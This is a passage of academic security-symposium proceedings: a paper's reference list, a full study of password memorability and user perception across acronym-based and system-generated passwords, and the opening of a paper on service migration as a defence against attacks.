[13] M. A. Sasse, S. Brostoff, and D. Weirich, “Transforming the 'weakest link' - a human/computer interaction approach to usable and effective security,” BT Technolgy Journal, vol. 19, no. 3, pp. 122-131, 2001.

[14] M. Warkentin, and R. Willison, “Behavioral and policy issues in information systems security: The insider threat,” European Journal of Information Systems, vol. 18, no. 2, pp. 101-105, 2009.

[15] B. Bulgurcu, H. Cavusoglu, and I. Benbasat, “Information security policy compliance: An empirical study of rationality-based beliefs and information security awareness,” MIS Quarterly, vol. 34, no. 3, pp. 523-A7, 2010.

[16] Y. Chen, K. R. Ramamurthy, and K.-W. Wen, “Organizations' information security policy compliance: Stick or carrot approach?” Journal of Management Information Systems, vol. 29, no. 3, pp. 157-188, 2012.

[17] A. Vance, P. B. Lowrey, and D. Eggett, “Using accountability to reduce access policy violations in information systems,” Journal of Management Information Systems, vol. 29, no. 4, pp. 263-289, 2013.

[18] M. Siponen, “A conceptual foundation for organizational information security awareness,” Information Management & Computer Security, vol. 8, no. 1, pp. 31-41, 2000.

[19] M. E. Thomson, and R. von Solms, “Information security awareness: Educating your users effectively,” Information Management & Computer Security, vol. 6, no. 4, pp. 167-173, 1998.

[20] M. Wilson, D. E. de Zafra, S. I. Pitcher, J. D. Tressler, and J. B. Ippolito, "Information technology security training requirements: A role- and performance-based model," National Institute of Standards and Technology, 1998.

[21] (2015), "Security awareness training," Internet: http://www.mediapro.com/products/product-catalog/security-awareness-training/, [May 9, 2015)

[22] M. Wilson, and J. Hash, "Building an information technology security awareness and training program," National Institute of Standards and Technology, 2003.

[23] R. Richardson (2011, May), “15th annual 2010/2011 computer crime and security survey,” InformationWeek, [On-line], Available: http://reports.informationweek.com/abstract/21/7377/Security/research-2010-2011-csi-survey.html, [Jan. 5, 2012].

[24] B. Schneier, (2013, Mar.), "Security Awareness Training," Schneier on Security, [On-line], Available: https://www.schneier.com/blog/archives/2013/03/security_awaren_1.html [May 13, 2015].

[25] (2015), "Wombat Security Technologies," Internet: https://www.wombatsecurity.com/security-education/educate?_bt=62822866514&_bk=security%25252520education%25252520and%25252520training&_bm=p&gclid=CMLOiKv6vsUCFdQ9gQodnTIAeQ, [May 13, 2015].

[26] SE-Team, (n.d.), "What is social engineering?" [On-line], Available: http://www.social-engineer.org/about/, [May 13, 2015].

[27] J. Stanganelli, (2013, Nov.), "How to fight social engineering," eSecurity Planet, [On-line], Available: http://www.esecurityplanet.com/network-security/how-to-fight-social-engineering.html, [May 2015].

[28] S. Northcutt, J. Shenk, D. Shackleford, T. Rosenberg, R. Siles, and S. Mancini, (2006, Nov.), "Penetration testing: Assessing your overall security before attackers do," SANS, [On-line], Available: https://www.sans.org/reading-room/whitepapers/analyst/penetration-testing-assessing-security-attackers-34635, [May 13, 2015].

[29] R. W. Rogers, “A protection motivation theory of fear appeals and attitude change,” The Journal of Psychology, vol. 91, pp. 93-114, 1975.

[30] M. Karjalainen, and M. Siponen, “Toward a new meta-theory for designing information systems (IS) security training approaches,” Journal of the Association for Information Systems, vol. 12, no. 8, pp. 518-555, 2011.

[31] R. LaRose, N. J. Rifon, and R. Enbody, “Promoting personal responsibility for Internet safety,” Communications of the ACM, vol. 51, no. 3, pp. 71-76, 2008.

[32] P. Puhakainen, and M. Siponen, “Improving employees' compliance through information systems security training: An action research study,” MIS Quarterly, vol. 34, no. 4, pp. 767-A4, 2010.

[33] J. E. Maddux, and R. W. Rogers, “Protection motivation and self-efficacy: A revised theory of fear appeals and attitude change,” Journal of Experimental Social Psychology, vol. 19, pp. 469-479, 1983.

[34] P. A. Rippetoe, and R. W. Rogers, “Effects of components of protection-motivation theory on adaptive and maladaptive coping with a health threat,” Journal of Personality and Social Psychology, vol. 52, no. 3, pp. 596-604, 1987.

[35] D. L. Floyd, S. Prentice-Dunn, and R. W. Rogers, “A meta-analysis of research on protection motivation theory,” Journal of Applied Social Psychology, vol. 30, pp. 408-420, 2000.

[36] J. D’Arcy, A. Hovav, and D. Galletta, “User awareness of security countermeasures and its impact on information systems misuse: A deterrence approach,” Information Systems Research, vol. 20, no. 1, pp. 79-98, 2009.

[37] L. Myyry, M. Siponen, S. Pahnila, T. Vartiainen, and A. Vance, “What levels of moral reasoning and values explain adherence to information security rules? An empirical study,” European Journal of Information Systems, vol. 18, no. 2, pp. 126-139, 2009.

[38] A. C. Johnston, M. Warkentin, and M. Siponen, “An enhanced fear appeal rhetorical framework: Leveraging threats to the human asset through sanctioning rhetoric,” MIS Quarterly, vol. 39, no. 1, pp. 113-134, 2015.

[39] S. Taylor, and P. Todd, “Assessing IT usage: The role of prior experience,” MIS Quarterly, vol. 19, no. 4, pp. 561-570, 1995.

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 5

[40] I. Ajzen, “The theory of planned behavior,” Organizational Behavior and Human Decision Processes, vol. 50, pp. 179-211, 1991.

[41] I. Ajzen, and M. Fishbein, “The prediction of behavioral intentions in a choice situation,” Journal of Experimental Social Psychology, vol. 5, pp. 400-416, 1969.

[42] V. Venkatesh, M. G. Morris, G. B. Davis, and F. D. Davis, “User acceptance of information technology: Toward a unified view,” MIS Quarterly, vol. 27, no. 3, pp. 425-478, 2003.

[43] S. Petter, W. DeLone, and E. R. McLean, “Information systems success: The quest for the independent variables,” Journal of Management Information Systems, vol. 29, no. 4, pp. 7-61, 2013.

[44] M. Warkentin, A. C. Johnston, and J. Shropshire, “The influence of the informal social learning environment on information privacy policy compliance efficacy and intention,” European Journal of Information Systems, vol. 20, no. 3, pp. 267-284, 2011.

[45] K. Witte, “Putting the fear back into fear appeals: The extended parallel process model,” Communication Monographs, vol. 59, no. 329-349, 1992.

[46] J. Lu, J. E. Yao, and C.-S. Yu, “Personal innovativeness, social influences and adoption of wireless Internet services via mobile technology,” Journal of Strategic Information Systems, vol. 14, pp. 245-268, 2005.

[47] A. C. Johnston, and M. Warkentin, “Fear appeals and information security behaviors: An empirical study,” MIS Quarterly, vol. 34, no. 3, pp. 549-A4, 2010.

[48] Y. Lee, and K. R. Larsen, “Threat or coping appraisal: Determinants of SMB executives' decision to adopt anti-malware software,” European Journal of Information Systems, vol. 18, no. 2, pp. 177-187, 2009.

[49] C. L. Anderson, and R. Agarwal, “Practicing safe computing: A multimethod empirical examination of home computer user security behavior intentions,” MIS Quarterly, vol. 34, no. 3, pp. 613-643, 2010.

[50] T. Herath, and H. R. Rao, “Protection motivation and deterrence: A framework for security policy compliance in organisations,” European Journal of Information Systems, vol. 18, no. 2, pp. 106-125, 2009.

[51] P. Ifinedo, “Understanding information systems security policy compliance: An integration of the theory of planned behavior and the protection motivation theory,” Computers & Security, vol. 31, no. 1, pp. 83-95, 2012.

[52] S. Pahnila, M. Siponen, and A. Mahmood, "Employees’ behavior towards IS security policy compliance," in Proceedings of the 40th Annual Hawaii International Conference on System Sciences, 2007 © IEEE.

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 6

Two Studies on Password Memorabilityand Perception

Delbert HartComputer Science Department

SUNY PlattsburghPlattsburgh, NY

Email: [email protected]

Abstract—Creating and remembering strong passwords isessential to ensure overall system security. This paper presentstwo studies that evaluate acronym based passwords and systemgenerated passwords in terms of memorability and user percep-tion.

Keywords—Password Security, Authentication, Human Factors

I. INTRODUCTION

Although there are many well known problems with usingpasswords for authentication, passwords are still the primarymeans of authentication in computer systems. From a user’spoint of view, they have to remember too many differentpasswords, some with arbitrary rules. From the system’s pointof view, users choose weak passwords. There are variousways to address the problems with password authenticationincluding password managers, password composition, black-lists, system-assigned passwords, expiration policies, reusingpasswords, writing them down, etc. Opinions differ on thesedifferent mitigation strategies. Reusing passwords is largelyfrowned upon, but users still do it. Professionals have differingopinions about writing passwords down. And so on. As withmany other issues in information systems security, choicesregarding password policy end up trading user convenienceagainst system security.

Until a replacement for passwords is widely adopted, it isimportant to help users choose strong passwords that they canreasonably remember. Surprisingly, this well known problemin information systems security has garnered relatively littleinvestigation [1]. This paper describes two studies that weredone to compare different password creation techniques forhow memorable the passwords were to end-users and the users’perceptions of the techniques. Most users create passwords inan ad-hoc manner. The goal of these studies was to introduceusers to a more structured way to create passwords, andmeasure the results. Learning more about users’ attitudestowards passwords and password creation will allow moreinformed choices about the trade-off between usability andsecurity.

The first study (2013) considered whether using songs orimages as prompts could improve a user’s ability to createa memorable acronym based password. It was conductedduring the spring of 2013, lasting 6 weeks, and involved 87participants.

The second study (2014) occurred during the spring andfall of 2014, with two groups of participants, 51 and 93users respectively, with each session lasting 6 weeks. The2014 study compared three types of password generation: user-chosen acronym passwords, system-generated random strings,and system-generated random phrases.

The next section provides an overview of the design of thestudies. Then the results from the studies are presented. Thefifth section surveys the related work, describing how this workdiffers from it, and compares previous outcomes to the resultsin this paper. The paper concludes with some discussion anda summary of the results from the studies.

II. STUDY DESIGN

Each study was conducted as part of a undergraduate classthat included password (and computer) security as a topic. Ineach instance students learned about password security beforethe study began.

A. Goals

The goals of the study were 1) to study the relative meritsof different techniques of creating passwords and 2) to increaseawareness of password best practices.

One of the problems users have with passwords is thedifficulty in creating and remembering strong passwords. Thisis especially true given the large number of passwords needed.(One large scale study of password usage [2] estimates that theaverage user has to manage 25 passwords for websites alone.)By investigating the attributes of different password creationtechniques, we can hopefully identify ways to make passwordsless onerous and more secure. The two main features investi-gated in these studies are the memorability of different typesof passwords, and users’ perception of the password creationtechniques.

As part of the studies, we included an education componentto benefit the study participants. Password education is impor-tant because many people are not aware of the best practicesin the area. It is unrealistic to expect users to create strongpasswords without an understanding of what makes a goodpassword. In [3], datasets of actual passwords were examined,and 40% of the passwords were easily guess-able.

The studies used in-person interviews to record passwordmemorability and user opinions. Each student identified three

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 7

participants who would be available during the six weeks of thestudy. The in-person interview format afforded the opportunityfor user education.

Students were instructed to give participants an overviewof what made a password strong and other practical adviceregarding passwords. Additional materials, including a leafletto hand out, and a website, provided metaphors and otherexamples to relate the abstract ideas of password securityto concepts/ideas the participants were more familiar with.For example, the password spaces associated with differentsize passwords (with different alphabets) were compared todifferent physical volumetric spaces. This physical metaphorwas used to provide participants with an intuitive sense ofthe entropy associated with passwords. Measuring passwordstrength by the entropy associated with the length and charactersets used is a common measure of password strength. Forinstance, a six character password with only lower case lettershas a maximum entropy of about 26.8 bits ( 6 x log2 26 )and a eight character password consisting of upper and lowercase letters, and numbers would have a maximum entropy ofabout 47.6 bits ( 8 x log2 62 ). Other measures of passwordstrength view it in terms of how long it would take a typicalattacker to guess the password. For example, Password123,may a member of a password space of 65 bits of entropy, butwould fall quickly to a dictionary based attack.

Each participant was randomly assigned to one of thepassword creation techniques, and then asked to generate a newpassword using it, with the help of the student if necessary. Itwas emphasized that this password should only be used for thisstudy and that they should never disclose a password that theyactually used for other purposes. Participant identities wereonly known by the student who contacted them. No identifiableinformation was recorded about the participants.

After the initial contact, students followed up with theparticipants at 1 week, at 2 (3) weeks, and at 6 weeks.The follow-up interviews checked to see how memorable thepassword they had chosen was and their attitudes regardingthe password. In designing the studies, one concern was thatsince the passwords were not used for any other purpose, thatit would be extremely difficult for participants to remember.To gain more information about memorability the participantswere provided with up to three hints. The number of hintsthat the participant needed to recall the password was thenrecorded.

To keep the participant’s experience in the study positive,the amount of effort was kept to a minimum. Each participantwas asked to create/remember only one password for the study.Limiting each participant to just one password also removedinterference effects [4] that can occur when participants areasked to memorize multiple passwords.

B. 2013 Study

The 2013 study investigated whether using songs or imagesas a starting point would improve the memorability of apassword as compared to acronyms based solely on text. Wechose songs to study as it seems plausible that passwordsbased on them would be more memorable and/or enjoyable.Images were chosen as another type of prompt because of theinterest in graphical/image based authentication (c.f., [5]). 87

participants were randomly assigned to one of the three groups;1) text based, 2) song based, or 3) image based. The text basedgroup was asked to base their password on a piece of prose,poetry, or dialogue that they were familiar with. Likewisethe song and image groups were instructed to choose sourcematerials that were meaningful. Before the study began, a setof examples of each type of source material was assembledto aid the participants. During the initial contact participantswere asked 1) to create a new password for this study, 2) howeasy the creating the password was, and 3) how satisfied theywere with the technique and resulting password.

At 1 week, 2 weeks, and 6 weeks the participants wereinterviewed again to see how memorable the password theycreated was. They were also asked again about their perceptionof the password (easiness and satisfaction).

For the text group, the hints described attributes of thesource text like context, author, etc. Hints for the song promptgroup could also include humming some of the melody of thesong. For the image group, hints could describe the context ofimage, or parts of the image.

C. 2014 Study

The 2014 study was administered twice, once in the springand once in the fall of 2014, with 51 and 93 participants,respectively. The 2014 study compared the memorability, sat-isfaction, easiness, and confidence of three different methods ofpassword generation. The 2013 study was successful in com-paring acronym creation using different prompts, so the 2014study compared acronym based passwords to system generatedpasswords. The first technique was a system generated randomstring. Randomly generated strings have always been an optionfor password creation, albeit not a popular one with users. Thesecond technique was a system generated random phrase, asadvocated by [6]. Random passphrases seem more appealingfrom a user-friendliness point of view.

Both types of system generated passwords had an entropyof 48 bits. The random string was 8 characters long chosenfrom an alphabet of 64 symbols; upper and lower case letters,the numbers 0-9, and the symbols: ’-’, and ’+’. The passphraseconsisted of four words randomly chosen from a list of 4,096words. The list of words was derived from a word frequencylist at [7], which identified the most commonly used words inthe English language.

Participants were allowed to generate severalstrings/phrases to find one they liked. Although thisdecreases the amount of entropy in the chosen password, itwas thought that providing the user the opportunity for someinput in the process was worth the cost. The study used aweb application to provide system generated passwords. Theaverage number of accesses per participant was less than 3.We did not measure the effect of allowing choice on the user’sperception of the technique. Regarding the effect on passwordstrength, a user would give up requesting replacements beforethe strength of the password was significantly degraded. Inmost cases the resulting entropy of the password would onlybe reduced by a couple of bits.

Participants in the acronym based group were given thefreedom to create any password that followed the technique.

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 8

Fig. 1. 2013 Study: Comparison of password generation techniques memo-rability, over time.

The resulting passwords had a large degree of variability intheir strength. Most of the passwords created with this tech-nique were weaker than the randomly generated passwords.

A hint in this study was to provide the first/nextword/symbol in the acronym/phrase/string.

D. Ecological Validity

Since the passwords participants chose were not used forany other purpose, there was very little motivation for themto remember the password chosen. If the password was usedmore often, or if it was for something important, then it islikely that the memorability would have been improved. Wedid not study passwords in the context of a real system in orderto safeguard the participants.

Students were allowed to choose the participants that theywould interview based on the ability to perform the followupinterviews, and some restrictions, e.g., a person could onlyparticipate once, they could not be in the class, etc. Potentiallythis may have biased the results. To our knowledge, therehave not been any studies comparing password usage betweenassociates of college students and the general population.

III. RESULTS

A. Memorability

Fig. 1 shows the memorability results for the 2013 study.Two sets of data are presented 1) recall without hints and 2)recall with hints. The bottom three lines correspond to thepassword recall rate without any hints. All three techniqueshad a memorability of about 20-22 percent at the end of thestudy without any hints. The top lines show the participantrecall with some hints. With up to three hints between 66-77percent of the participants were able to recall the password.

Fig. 2 summarizes the memorability results from the 2014study. By the end of the study, acronym passwords had arecall rate (with no hints) of 26%, which is consistent withthe 2013 study. The recall rates at the Week 1 and Week3 interviews were better at 53% and 38%, respectively, than

Fig. 2. 2014 Study: Comparison of password generation techniques memo-rability, over time.

the corresponding interviews in the 2013 study. One possibleexplanation for the difference between the 2013 and 2014studies among the acronym participants is the 2014 group hadmore flexibility in their choice of source phrase.

Looking at the performance without hints for the systemgenerated passwords, it is unclear why both the random stringand random phrase recall rates were weaker at the Week 3interview than at the Week 6 interview. The random stringperformance was approximately 13% at Weeks 1 and 6, butdropped to 8% at Week 3. The random phrase recall rate startedat 23%, dropped to 4%, and then recovered to 22%.

The system generated techniques’ recall rates with hintsdropped at Week 3, and then stayed the same or decreasedslightly at the Week 6 interview. More studies of system gen-erated passwords memorability are needed to better understandthe behavior seen.

In the fall cohort of the 2014 study we provided the randomstring users with a possible mnemonic device for the generatedpassword. After the random string was generated, the webapplication presented a list of common words that the randomstring was an acronym for. The users were not instructed toview the string as an acronym, but it was presented as anoption. No significant differences in performance were foundbetween the spring and fall random string groups in terms ofmemorability or perception of the technique.

Looking at the data from both studies, the acronym basedpasswords had better recall than the system generated pass-words. This result is consistent with the generation effect [8],where it is easier to remember information you create overinformation you receive. The number of participants was notsufficient to analyze the extent that the improved recall of theacronym passwords was due to them being weaker than therandom passwords.

B. Perception

The characteristics of users’ perception investigated inthese studies were satisfaction, easiness, and confidence. The

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 9

Fig. 3. 2014 Study: Comparison of the different password generationtechniques in user satisfaction in the password created over time.

“satisfaction” attribute measured whether the user thoughtthe password technique was something that they could usefor other passwords. “Easiness” described how much effortthe users thought was required to use the password/passwordtechnique. “Confidence” was how strong the users thought thepassword was from a technical perspective.

Fig. 3 shows users’ opinions about how satisfied theywere with the password they created in the 2014 study.Unsurprisingly the acronym approach was more positivelyviewed than the system generated strings and phrases. Oneinteresting result is how the random phrase approach is initiallyviewed more positively than the random string approach, butthe two approaches are viewed almost identically by theend of the study. Recall that each participant only used oneapproach in the study, so they are not comparing the twoapproaches to each other. The members of the two groupsare independently converging in their opinion. The acronymgroup remains relatively positive in their satisfaction with thattechnique. It is also interesting to note that the changes insatisfaction are not correlated with the memorability successrates.

The users’ satisfaction with the techniques in the 2013study were similar to each other. The image and song promptsfor creating the acronyms did not have any significant effecton the users’ satisfaction of the underlying mechanism.

In the 2014 study, users’ perception of the “easiness”attribute is shown in Fig. 4. The acronym technique has amore positive perception than either of the random techniques.The random phrase technique starts with a stronger positiveview than the random string technique, but by the end of thestudy the two random password types are similarly perceivedin terms of easiness.

Looking into these perceptions more closely, there is astatistically significant relationship between perception of sat-isfaction and easiness. This relationship is illustrated by the2014 study data shown in Fig. 5. This relationship is nota side-effect of reactions to the different password creationtechniques. The 2013 study’s techniques were all acronyms

Fig. 4. 2014 Study: Comparison of the different password generationtechniques in user perception of easiness.

Fig. 5. 2014 Study: Comparison of user satisfaction with a passwordgeneration technique with how easy they thought it was.

based passwords with different prompts, and the relationshipholds there also (see Fig. 6).

To further investigate the relationship between users’ per-ception of easiness and satisfaction, the 2014 study also askedusers about their confidence in the password creation tech-nique. The goal was to differentiate the extent the satisfactionattribute reflected users’ perception of the validity/value of thepassword and how much it reflected their visceral experienceof using it. The confidence results for the three techniquesover time is shown in Fig. 7. Users’ confidence was highestfor those in the random string group. Interestingly, users in theacronym group were more confident in their passwords thanusers in the random phrase group.

Looking at the relationship between users’ perception ofeasiness and confidence, the 2014 study did not find anyrelationship between the two attributes. Fig. 8 illustrates theclear lack of correlation between the two attributes.

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 10

Fig. 6. 2013 Study: Comparison of user satisfaction with a passwordgeneration technique with how easy they thought it was.

Fig. 7. 2014 Study: Comparison of the different password generationtechniques in user confidence in the password created over time.

IV. DISCUSSION

A. Memorability

Intuitively, there is an observer effect that must be consid-ered when studying password memorability. When a partic-ipant attempts to recall a password they simultaneously arereinforcing the memory of the password. As shown in [9]repetition is an important factor in password recall. In the 2014study, it is possible that the Week 6 recall results improved overthe Week 3 results due to the Week 3 interview. Further work isneeded though to confirm whether this is a likely explanation.

Another interesting observation from the studies in thispaper is that, even with no hints, that at Week 6 participantshad a success rate of 13%-22% on the randomly generatedpasswords. This rate was higher than expected for passwordsthat had minimal repetition and no usage outside of this study.It would be interesting to study the decay rate of recall overlong periods of time with minimal repetition.

Fig. 8. 2014 Study: User confidence in the password created for the differentpassword generation techniques over time.

B. Perception

The more favorable perception of the acronym based pass-words compared the random passwords was expected. It wasinteresting that the novelty of song/image prompted acronymsdid not receive a more favorable rating compared to the textbased acronyms. Perhaps the text based acronyms were justas novel to users who typically create passwords in an ad-hocmanner.

It was surprising to see the users’ perception of randomphrases and random strings converge. Over time, users inthe random string group improved their opinion about thattechnique, and users in the random phrase group loweredtheir opinion about that approach. More investigation of thelong term perception of password creation techniques wouldbe useful to confirm this result. Perhaps system generatedpasswords are only negatively viewed as compared to ad-hocpassword generation.

C. Education

These studies did not attempt to assess the effectiveness ofthe educational component of the interviews. Because of thesensitive nature of passwords in actual usage, it is difficult todirectly measure the effectiveness of education.

It was instructive to see that users’ confidence in randomphrases was less than their confidence in random strings, eventhough the two approaches had the same entropy. The useof commonly used words to populate the phrases may havebelied the strength of the approach. Although the educationalmaterials included the idea of entropy and password spacesize as measures of password strength, we did not provide theparticipants with the details of the strength of the generatedpasswords.

V. RELATED WORK

Over the past 35 years, there has only been about 58 studieson password use and security [1]. Given the number of factorsinvolved in password usage, password creation methods, and

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 11

experimental approach the studies in this paper provide newdata to better understand password security.

One challenge in password memorability studies is therelationship of time to memory. Many password studies haveonly spanned hours or days in terms of the length of the study.The studies in this paper both spanned six weeks. Two otherrelatively long term studies were done by Blocki et al. [9] andYan et al. [10].

Blocki et al. studied the effect of repetition on the abilityto recall passwords. In this study users were asked to generatepasswords based on Person-Action-Object stories, where afamous person is paired with actions and objects. They werethen provided a rehearsal schedule spanned up to 127 days.There were several differences between the Blocki study andthe studies in the paper including:

• The Blocki study was examining the effect that spacedrepetition (practice) of the password had on the abilityto recall it over time.

• The Blocki study did not provide hints, but the actionsand objects options of the password were browse-ableby the participants. One of their groups were alsopresented with an image prompt that was shown whenthe password was created.

• The Blocki study utilized Amazon’s Mechanical Turkservice [11] for recruiting study participants. It wasable to include more participants, but there was lessdirect contact with the participants.

• The Blocki study also had some of the participantsattempt to memorize up to 4 passwords.

We view the results of the studies in this paper as consistentwith Blocki et al.’s study. Users in the 2013 study with hintsperformed close to the level of the Blocki study. Given theBlocki study’s participants’ ability to browse the actions andobjects before attempting the password, we believe the perfor-mance with hints is the right measure to compare. Browsingthe actions/objects available provides the participants withinformation beyond their own memory. From the 2014 study,the user defined acronym group performed similarly. Users inthe random phrases and random string groups performed about2/3rds as well as the users in the Blocki study. Most of thisdifference is likely due to the increased level of repetition andpractice that the Blocki study participants had. The Person-Action-Object technique may also be a contributing factor.

The Blocki study found that spaced repetition of passwordshad a significant effect on participants’ ability to recall thepasswords. They also found Person-Action-Object story pass-words outperformed random action-object passwords.

In Yan et al.’s study they divided 288 students into threegroups, each receiving a different instruction sheet with pass-word advice. Then after 1 month they attacked the participants’passwords, as well as 100 students not in the study. At fourmonths they surveyed the participants about how difficult theparticipants found the passwords and how long they had keptwritten notes to help remember the passwords. Some otherdifferences between this study and the ones in this paper:

• The focus of the Yan study was on the guessability ofthe participants’ passwords, and the effect of providing

different information on the instruction sheets on theguessability. The studies in this paper attempted todistinguish between differences in different passwordtechniques.

• While the Yan study provided two different passwordtechniques to two of the groups (with the third be-ing a control group), they had no way to measurethe participants’ compliance with the advice given.Although the improvement in resilience to cracking issuggestive that there was a positive effect, it is difficultto tell how much was due to the technique described.In contrast, the studies in this paper used an in-personinterview format, hence we could be certain about thecompliance of the participants.

• The uncertainty in compliance also makes it moredifficult to interpret the participants’ perceived levelof difficulty with a technique.

One study that compared a range of password creationtechniques is Shay et al. [12], which looked at 11 differentvariations of system generated, random passwords, includingrandom phrases and strings. The results of this study wereconsistent with the studies in this paper, but there are a numberof significant differences that preclude direct comparisonsof the results. The Shay study recruited participants usingAmazon’s Mechanical Turk [11] service. The Shay study alsodiffered on the span of time over which memorability wastested. Participants practiced the system generated password,and then were asked to recall it a few minutes later. Theywere then tested again after two days. The study comparedthe relative performance of the different password generationtechniques. One challenge that the study faced was that theirparticipants interacted with them only online. For instance,about 73% of the participants had written their password down.The Shay study also looked at user sentiment, measuring user’s“annoyance”, “difficulty”, and “fun” on Likert scales.

A recent study by Fraune et al. [13] looked at whether usingimages could enhance the memorability of system generatedpasswords. The study had 24 participants and examined 3picture based memory aid techniques (plus a control session).They tested them at 5 minutes and at 1 week intervals. Thestudy found that the picture techniques did aid in recall.One potential complication though is the picture techniquesincreased the amount of time the participants spent initiallyduring the password learning phase. In this paper’s 2013 study,no significant difference was found between the image-basedacronyms and the other acronym prompts. Another differencebetween the 2013 and the Fraune study is the 2013 studyhad user generated passwords, whereas the Fraune study usedsystem generated passwords.

Vu et al. reported in [14] about three studies that exam-ined the generation and interference effects associated withpassword memorability. The number of participants in theexperiments ranged from 32 - 60 students. The participantswere asked to create passwords for either 3 or 5 accounts,and then tested again at 1 week to see how many attemptswere needed to recall the passwords. In their experiments theyfound that 1) testing the participants at 5 minutes improvedthe performance at 1 week, 2) the 3 account group performed

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 12

better than the 5 account group, and 3) that using an acronymmnemonic improved recall.

The studies discussed above are the ones closest to thework in this paper. There is still a need for more research in thisarea. The studies in this paper provide some new experimentalevidence regarding password security. Some strengths of thesestudies were the use of interviews for the password studies,the number of follow-ups, and the length of time the studieswas conducted over.

VI. SUMMARY

The studies presented compared the relative memorabilityand user perception of different techniques of generating pass-words. The 2013 study focused on acronym based passwords,differing in the type of source material used to generate thepasswords. No significant differences were found between thetext-based, image-based, and song-based acronyms in terms ofmemorability or perception.

The 2014 study found the acronym based passwords ashaving better recall than the randomly generated passwords. Ingeneral though, the user created passwords were weaker thanthe randomly generated ones. Although initially the randomphrase technique was viewed more favorably than the randomstring technique, over time attitudes towards the two randommethods converged.

Both studies found a relationship between user perceptionof easiness of the technique and how satisfied they were withit. Data from the 2014 study indicates that a user’s confidencein the password is independent of satisfaction and easiness.

REFERENCES

[1] V. Taneski, M. Hericko, and B. Brumen, “Password securityno change in35 years?” in Information and Communication Technology, Electronicsand Microelectronics (MIPRO), 2014 37th International Convention on.IEEE, 2014, pp. 1360–1365.

[2] D. Florencio and C. Herley, “A large-scale study of web passwordhabits,” in Proceedings of the 16th international conference on WorldWide Web. ACM, 2007, pp. 657–666.

[3] D. Malone and K. Maher, “Investigating the distribution of passwordchoices,” in Proceedings of the 21st International Conference on WorldWide Web, ser. WWW ’12. New York, NY, USA: ACM, 2012, pp. 301–310. [Online]. Available: http://doi.acm.org/10.1145/2187836.2187878

[4] M. Bunting, “Proactive interference and item similarity in workingmemory.” Journal of Experimental Psychology: Learning, Memory, andCognition, vol. 32, no. 2, p. 183, 2006.

[5] R. Biddle, S. Chiasson, and P. C. Van Oorschot, “Graphical passwords:Learning from the first twelve years,” ACM Computing Surveys (CSUR),vol. 44, no. 4, p. 19, 2012.

[6] R. Monroe. Password strength. [Online]. Available: http://xkcd.com/936

[7] M. Davies. Corpus of contemporary american english. Accessed:2014-02-23. [Online]. Available: http://www.wordfrequency.info/

[8] S. Bertsch, B. J. Pesta, R. Wiscott, and M. A. McDaniel, “The gen-eration effect: A meta-analytic review,” Memory & Cognition, vol. 35,no. 2, pp. 201–210, 2007.

[9] J. Blocki, S. Komanduri, L. F. Cranor, and A. Datta, “Spacedrepetition and mnemonics enable recall of multiple strongpasswords,” CoRR, vol. abs/1410.1490, 2014. [Online]. Available:http://arxiv.org/abs/1410.1490

[10] J. Yan et al., “Password memorability and security: Empirical results,”IEEE Security & privacy, no. 5, pp. 25–31, 2004.

[11] Amazon.com. [Online]. Available: https://www.mturk.com/[12] R. Shay, P. G. Kelley, S. Komanduri, M. L. Mazurek, B. Ur, T. Vidas,

L. Bauer, N. Christin, and L. F. Cranor, “Correct horse batterystaple: Exploring the usability of system-assigned passphrases,” inProceedings of the Eighth Symposium on Usable Privacy and Security,ser. SOUPS ’12. New York, NY, USA: ACM, 2012, pp. 7:1–7:20.[Online]. Available: http://doi.acm.org/10.1145/2335356.2335366

[13] M. R. Fraune, K. A. Juang, J. S. Greenstein, K. C. Madathil, andR. Koikkara, “Employing user-created pictures to enhance the recallof system-generated mnemonic phrases and the security of passwords,”in Proceedings of the Human Factors and Ergonomics Society AnnualMeeting, vol. 57, no. 1. SAGE Publications, 2013, pp. 419–423.

[14] K.-P. L. Vu, R. W. Proctor, A. Bhargav-Spantzel, B.-L. B. Tai, J. Cook,and E. E. Schultz, “Improving password security and memorability toprotect personal and organizational information,” International Journal

of Human-Computer Studies, vol. 65, no. 8, pp. 744–757, 2007.

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 13

A Holistic Approach for Service Migration Decision,

Strategy and Scheduling

Yanjun Zuo

University of North Dakota

Grand Forks, ND, USA

Abstract—Service migration can be used as a security

mechanism to dynamically move critical services from their

current compromised platforms to other clean, healthy platforms

in a security incident to avoid further loss and to ensure the

services are continuously provided to users. We present a holistic

approach for service migration decision, strategy specification

and scheduling arrangement. Our approach represents the

management aspect of a service migration and is essential for

conducting an effective and efficient service migration to respond

to malicious attacks. We apply transferable belief theory, fuzzy

inference and logic reasoning to implement the decision

components of this approach. The proposed methodology can be

used in various service migration scenarios.

Keywords—service migration; decision; strategy; scheduling

I. INTRODUCTION

With an increasing complexity of cyber-attacks, security mechanisms must be proactive and dynamic. Reconfiguration and self-management become an essential design requirement for mission-critical systems to effectively defend against malicious attacks. Service migration represents a reconfigurable feature of a self-management system which automatically relocates critical services from their current compromised platforms to other clean, healthy platforms in case of a security incident in order to make those services continuously provided even when some platforms have been damaged. Service migration is an important system property to improve a system’s survivability in case of malicious attacks.

Technically, service migration can be used not only as a responsive approach for malicious attacks but also as part of a moving-target-defense strategy, where critical services are scheduled to relocate to other platforms periodically and systems are reconfigured in a pre-defined but seemly random (to the attackers) fashion. In the latter case, since services run on different platforms from time to time, any knowledge gained by the attackers about the systems and the services will be quickly expired, thus eliminating the attackers’ ability to further attack the system.

